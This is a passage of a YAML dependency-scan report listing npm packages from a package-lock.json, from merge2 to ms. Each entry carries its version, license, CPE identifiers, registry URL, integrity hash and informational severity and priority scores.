locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:merge2:merge2:1.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/merge2@1.4.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz
|
|
integrity: sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b23a5664e0d696ec
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: methods 1.1.2'
|
|
title: methods 1.1.2
|
|
description: 'Package discovered: methods 1.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a17abee1ae67ac79
|
|
name: methods
|
|
version: 1.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:methods:methods:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/methods@1.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/methods/-/methods-1.1.2.tgz
|
|
integrity: sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e5492a26182452ae
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: micromatch 4.0.8'
|
|
title: micromatch 4.0.8
|
|
description: 'Package discovered: micromatch 4.0.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: dc31731ddf283ca7
|
|
name: micromatch
|
|
version: 4.0.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jonschlinkert:micromatch:4.0.8:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/micromatch@4.0.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz
|
|
integrity: sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==
|
|
dependencies:
|
|
braces: ^3.0.3
|
|
picomatch: ^2.3.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: cdd82acabfa8e9e8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: mime 1.6.0'
|
|
title: mime 1.6.0
|
|
description: 'Package discovered: mime 1.6.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 10b23cab35239c6d
|
|
name: mime
|
|
version: 1.6.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:mime_project:mime:1.6.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/mime@1.6.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/mime/-/mime-1.6.0.tgz
|
|
integrity: sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a724fe9397f99c40
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: mime 3.0.0'
|
|
title: mime 3.0.0
|
|
description: 'Package discovered: mime 3.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 438a12c55a1c15bf
|
|
name: mime
|
|
version: 3.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:mime_project:mime:3.0.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/mime@3.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/mime/-/mime-3.0.0.tgz
|
|
integrity: sha512-jSCU7/VB1loIWBZe14aEYHU/+1UMEHoaO7qxCOVJOw9GgH72VAWppxNcjU+x9a2k3GSIBXNKxXQFqRvvZ7vr3A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1454de8382f97ba2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: mime-db 1.52.0'
|
|
title: mime-db 1.52.0
|
|
description: 'Package discovered: mime-db 1.52.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e010d1b3c9ab0c02
|
|
name: mime-db
|
|
version: 1.52.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:mime-db:mime-db:1.52.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime-db:mime_db:1.52.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime_db:mime-db:1.52.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime_db:mime_db:1.52.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime:mime-db:1.52.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime:mime_db:1.52.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/mime-db@1.52.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz
|
|
integrity: sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c62c037f2c05a588
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: mime-types 2.1.35'
|
|
title: mime-types 2.1.35
|
|
description: 'Package discovered: mime-types 2.1.35'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d035c2d2cba76761
|
|
name: mime-types
|
|
version: 2.1.35
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:mime-types:mime-types:2.1.35:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime-types:mime_types:2.1.35:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime_types:mime-types:2.1.35:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime_types:mime_types:2.1.35:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime:mime-types:2.1.35:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:mime:mime_types:2.1.35:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/mime-types@2.1.35
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz
|
|
integrity: sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==
|
|
dependencies:
|
|
mime-db: 1.52.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 39275c688371843a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: minimatch 9.0.9'
|
|
title: minimatch 9.0.9
|
|
description: 'Package discovered: minimatch 9.0.9'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: dadb042585b0fc99
|
|
name: minimatch
|
|
version: 9.0.9
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:minimatch_project:minimatch:9.0.9:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/minimatch@9.0.9
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz
|
|
integrity: sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==
|
|
dependencies:
|
|
brace-expansion: ^2.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fe3ea9bf939aec06
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: minimist 1.2.8'
|
|
title: minimist 1.2.8
|
|
description: 'Package discovered: minimist 1.2.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bf8bc4c7577fa757
|
|
name: minimist
|
|
version: 1.2.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:minimist:minimist:1.2.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/minimist@1.2.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz
|
|
integrity: sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 43d359d2fd9254cd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: minipass 7.1.3'
|
|
title: minipass 7.1.3
|
|
description: 'Package discovered: minipass 7.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a4e62963fcdf0651
|
|
name: minipass
|
|
version: 7.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BlueOak-1.0.0
|
|
spdxExpression: BlueOak-1.0.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:minipass:minipass:7.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/minipass@7.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz
|
|
integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 371d68f8a3e92216
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: mkdirp 0.5.6'
|
|
title: mkdirp 0.5.6
|
|
description: 'Package discovered: mkdirp 0.5.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4ee017b1ce1fca30
|
|
name: mkdirp
|
|
version: 0.5.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:mkdirp:mkdirp:0.5.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/mkdirp@0.5.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz
|
|
integrity: sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==
|
|
dependencies:
|
|
minimist: ^1.2.6
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 85ab0a570b2a1b2d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: morgan 1.10.1'
|
|
title: morgan 1.10.1
|
|
description: 'Package discovered: morgan 1.10.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0b0e2e978d7d93f4
|
|
name: morgan
|
|
version: 1.10.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:morgan_project:morgan:1.10.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/morgan@1.10.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/morgan/-/morgan-1.10.1.tgz
|
|
integrity: sha512-223dMRJtI/l25dJKWpgij2cMtywuG/WiUKXdvwfbhGKBhy1puASqXwFzmWZ7+K73vUPoR7SS2Qz2cI/g9MKw0A==
|
|
dependencies:
|
|
basic-auth: ~2.0.1
|
|
debug: 2.6.9
|
|
depd: ~2.0.0
|
|
on-finished: ~2.3.0
|
|
on-headers: ~1.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 19152fd7179a58f9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ms 2.0.0'
|
|
title: ms 2.0.0
|
|
description: 'Package discovered: ms 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 46f1aa86e531772d
|
|
name: ms
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:vercel:ms:2.0.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/ms@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ms/-/ms-2.0.0.tgz
|
|
integrity: sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c6acafac62af1ee0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ms 2.1.3'
|
|
title: ms 2.1.3
|
|
description: 'Package discovered: ms 2.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bb1077662b3cb7e0
|
|
name: ms
|
|
version: 2.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:vercel:ms:2.1.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/ms@2.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ms/-/ms-2.1.3.tgz
|
|
integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
